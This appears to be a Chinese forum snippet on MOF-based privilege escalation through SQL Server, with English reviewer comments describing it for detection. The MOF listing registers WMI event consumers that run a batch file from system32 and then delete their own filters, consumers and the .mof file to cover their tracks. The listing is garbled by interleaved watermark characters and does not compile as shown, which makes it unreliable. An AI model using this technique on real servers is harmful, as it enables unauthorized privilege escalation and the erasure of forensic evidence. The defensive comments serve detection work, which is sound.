这个sql提权MOF需要运行 system下的文件,不能定义路径。" a- j, _3 i) `+ X1 M [$ ?
需要将要运行的命令写入到bat上传到system32目录,然后执行。) q* T( l3 m$ N! o5 c" b2 W
! `5 j4 ]: A) _8 X! |
这个sql提权MOF需要运行 system下的文件,不能定义路径。# ~- R- K4 g( z4 W
需要将要运行的命令写入到bat上传到system32目录,然后执行。
1 r, V: e0 U: j
// NOTE(review): forum-watermarked (garbled) MOF listing of a permanent WMI event
// subscription. The interleaved noise characters are not MOF and this text does not
// compile as-is; it is kept as a reference for recognising the artifact, not for use.
// What the listing shows, for detection purposes:
//   - everything is registered under root\cimv2 (see the #pragma namespace below),
//     not the usual root\subscription, so hunts that only enumerate
//     root\subscription for __EventFilter / __EventConsumer /
//     __FilterToConsumerBinding instances will miss it;
//   - consumer "ASEC" runs "cmd.bat" via WScript.Shell and then deletes its own
//     class, filter and consumer objects; consumer "qndASEC" deletes the .mof and
//     the batch file once that process exits, so on-box objects are short-lived;
//   - durable evidence therefore lives in logs rather than in the repository:
//     Microsoft-Windows-WMI-Activity/Operational (event 5861, permanent
//     subscription registration) and Sysmon WMI events 19/20/21, plus process
//     telemetry for "cmd.bat" with the script-consumer host (typically
//     scrcons.exe) as parent.
7 h1 {: x" G K) ^9 N5 P% I0 |#pragma, z4 {$ `" q1 A B; j
// All following definitions are compiled into root\cimv2.
namespace("\\\\.\\root\\cimv2")
// Marker class; creating an instance of it is what the "instfilt" filter below
// selects on, i.e. it is the trigger for the first consumer.
3 A3 ^1 B% _. I* d' x' v7 ~ class, \( |0 G8 _8 x. i
MyClass547: T. E' B- }4 p2 M
{ [key]1 }, p) y, |& y8 D& a
string
7 ]8 r- s1 y) Y7 D) | Name;
3 w% k# g* F, d };
// Re-declares the ActiveScriptEventConsumer class (derived from __EventConsumer)
// inside this namespace: key Name, ScriptingEngine, ScriptFileName, ScriptText,
// KillTimeout.
( z1 h" b, P7 R/ m" q& o class
% Y, G7 _8 |' I0 {. J4 J; G ActiveScriptEventConsumer
, p: _- S4 {+ K u. G; X& P : __EventConsumer { [key]/ W% U0 m7 {3 a# `3 a' n+ X
string
/ O1 ~" D9 j) E) F; u Name; [not_null]
; |" G' b% g; S5 g4 o. x string
4 l7 n. v, d+ J" y$ I ScriptingEngine; string
, F. l' r, X) Q/ S8 i% [5 E% h ScriptFileName; [template]
- ]* S/ X, ?, O. K, q$ b string
) f& F7 _$ s! C8 Y ScriptText; uint32 KillTimeout;3 G4 G& g' V' _& ^7 L/ z& U
// Provider registration for the scripting consumer in this namespace; the CLSID
// is the one given in the listing.
}; instance of __Win32Provider as $P {
9 h, s9 s5 U1 l6 Q; R9 p s6 m Name r( C1 d) y8 o: L2 H% @9 P2 k; }
=
% a$ c4 A8 `! ~* r' n "ActiveScriptEventConsumer"; CLSID =
: w* o, x8 \5 M2 W- C5 ^3 C5 e8 C "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";! I |9 P' ]: N: S; w p
PerUserInitialization: r2 U! w5 Z- N2 V2 O
= TRUE;
// Binds provider $P to the ActiveScriptEventConsumer class name.
7 O/ e. o3 y/ S# z: M9 b }; instance of __EventConsumerProviderRegistration { Provider/ F; u1 X; e# @2 g
= $P; ConsumerClassNames
/ X) q, |) A, I/ Y9 a$ {" Q' Z =. y' Z e( t; \0 j1 F& k$ E0 a
{"ActiveScriptEventConsumer"};# L1 A/ X) C) f* H0 [- m9 r
};! W) _, v7 Y9 Y0 f
// Consumer $cons ("ASEC"): JScript that runs "cmd.bat" through WScript.Shell,
// then deletes MyClass547, the "instfilt" filter and itself from root\cimv2.
Instance of ActiveScriptEventConsumer
" G8 u& s# z% V" J; p# q0 ^! ~ as $cons { Name
" H6 z' O5 S7 K: J, `/ _. S+ E5 A =
* A) D- Q! b3 w "ASEC"; ScriptingEngine
7 D3 s& }. y5 B' g: L& L; v =/ h, F( L& c7 v( s
"JScript"; ScriptText x$ A. O* Q2 c4 M: y
=2 z* W' q$ n; k" \ D9 O3 c+ Q
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };0 F& I) r# S/ K
// Consumer $cons2 ("qndASEC"): clean-up script that deletes the compiled .mof
// (wbem\mof\good\hBsBa.mof) and cmd.bat, then removes the "qndfilt" filter and
// itself. Its paths are relative, so the files it targets depend on the working
// directory of the consumer host -- not determinable from this listing.
Instance of ActiveScriptEventConsumer8 T8 Y4 G: L4 \5 s' a- q8 D
as $cons2 { Name- ]& h: A& F& t2 K+ Z! W/ W
=
# _0 C4 H( [ s% l2 _- \( j/ H "qndASEC"; ScriptingEngine
4 s! Z0 y1 q2 r' A" A = [# t( J) v+ D' d- \6 f: I _6 ]
"JScript"; ScriptText" `' ~! M7 c7 z( T) s" Q. `
=
3 X5 m" t' t" f Z "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";$ N% k) @1 C. o8 H
// Filter $Filt ("instfilt"): fires on creation of any MyClass547 instance.
}; instance of __EventFilter as $Filt { Name
) z9 d: Z/ _/ u" m1 @/ c =7 b: \# ?' l% a! N, w o, r
"instfilt"; Query; G- n4 t b! {1 G
=
. q! H# B9 X" | "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
1 ]1 r9 M9 r& V o4 l1 K, v7 C =) E" Z1 o1 i( m( a
// Filter $Filt2 ("qndfilt"): polls every second for a Win32_Process named
// "cmd.bat" disappearing, i.e. the batch file finishing.
"WQL"; }; instance of __EventFilter as $Filt2 { Name
. k* z/ U+ K& P. \% @- d1 ]" t =5 A; t S7 S/ s; \
"qndfilt"; Query
+ S0 w, i7 h! O* V6 ` =
, }" @) \% I. Q, u: ?# G "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage9 V4 l+ W: `' X
=
// Bindings: instfilt -> ASEC and qndfilt -> qndASEC. These two
// __FilterToConsumerBinding rows are the most reliable thing to query for.
- v' {* U. l% o: Z% t "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer" J' s$ I; ]9 G3 n
= $cons; Filter
& V% x$ {' P1 d( [7 p = $Filt;# U/ V) r* I7 k' S6 F7 V
}; instance of __FilterToConsumerBinding as $bind2 { Consumer2 x: A7 P- ?) z7 s5 m) i; \5 Q
= $cons2; Filter
, z( D. }# x9 M0 E = $Filt2;2 H9 I+ \1 ?6 |' L2 O
// Trigger: instantiating MyClass547 here matches $Filt's query as soon as the
// .mof is compiled, so compilation itself starts the chain.
}; instance of MyClass547" n* R3 q8 s" W! l8 K3 h8 h
as $MyClass { Name8 v" }; k9 v5 j* Q U6 ?( j6 Y/ o
=* K+ D! i0 U2 P7 ]; R. v) b
"ClassConsumer";
2 n/ e* W2 e- [ E! ] }; |